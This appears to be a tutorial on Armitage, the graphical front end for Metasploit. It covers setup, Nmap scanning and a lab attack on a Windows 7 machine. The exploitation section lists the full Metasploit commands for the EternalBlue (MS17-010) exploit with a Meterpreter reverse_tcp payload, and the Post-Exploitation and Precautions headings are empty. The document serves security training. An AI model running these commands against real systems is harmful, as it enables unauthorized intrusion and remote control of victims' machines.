Armitage – Graphical Cyber Attack Management for Metasploit

๐Ÿงญ Overview

Armitage is a powerful graphical user interface (GUI) front-end for the Metasploit Framework, designed to streamline and visualize the penetration testing process. Created by Raphael Mudge, Armitage allows security professionals and students to visualize targets, manage exploits, and automate post-exploitation tasks in a collaborative and intuitive manner.

It is widely used in cybersecurity training environments, Capture The Flag (CTF) competitions, and internal red team operations to demonstrate how real-world attacks unfold visually.

๐Ÿงฐ Armitage Setup

Before using Armitage, you need to have Metasploit Framework and PostgreSQL database configured properly.

โœ… Step-by-Step Setup Instructions

sudo apt update
sudo apt install metasploit-framework
sudo apt install armitage

Start the PostgreSQL Database:

sudo service postgresql start
msfdb init

Launch Armitage:

sudo armitage
When prompted:
Host: 127.0.0.1
Port: 55553
User: msf
Password: leave blank or use msf

If Armitage fails to connect, ensure no firewall or conflicting service is blocking port 55553.

๐Ÿ” Armitage Scanning

๐Ÿ”Ž 1. Host Discovery

From the menu:

Hosts → Nmap Scan → Intense Scan (no ping)

This uses Nmap to identify hosts on the target network. Detected hosts will appear visually in the Armitage interface.

๐Ÿ”Ž 2. Service Detection

Click on a discovered host and choose:

Scan → Services

This uses Metasploit’s auxiliary scanner modules to detect open ports and services.

๐Ÿงช Example Nmap Command:

nmap -A 192.168.1.105

It may return services like SSH, HTTP, SMB. Armitage will map them visually for easy targeting.

๐Ÿ’ฃ Armitage Exploitation

โœ… 1. Choose a Target

Click on a host icon → Right-click → Attack → Select an exploit.

โœ… 2. Launching an Exploit

Example: Exploiting EternalBlue (MS17-010) on Windows:

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.105
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
exploit

Or use the Armitage UI to right-click → Attack → select exploit → configure → Launch.

โœ… 3. Post-Exploitation

After success:

๐Ÿ–ฅ๏ธ Real-World Example Lab

Lab Goal: Exploit a vulnerable Windows 7 machine on local network.

Setup:

Steps:

  1. Start Armitage and scan subnet: 192.168.1.0/24
  2. Detect IP with SMB open (e.g. 192.168.1.105)
  3. Select ms17_010_eternalblue exploit
  4. Configure payload: windows/meterpreter/reverse_tcp
  5. Launch and gain access to shell

๐Ÿ›ก๏ธ Precautions

๐Ÿ“š Conclusion

Armitage enhances Metasploit by offering a friendly, visual interface to manage penetration testing tasks.

It is ideal for both cybersecurity students and red team professionals looking to improve productivity and clarity during assessments.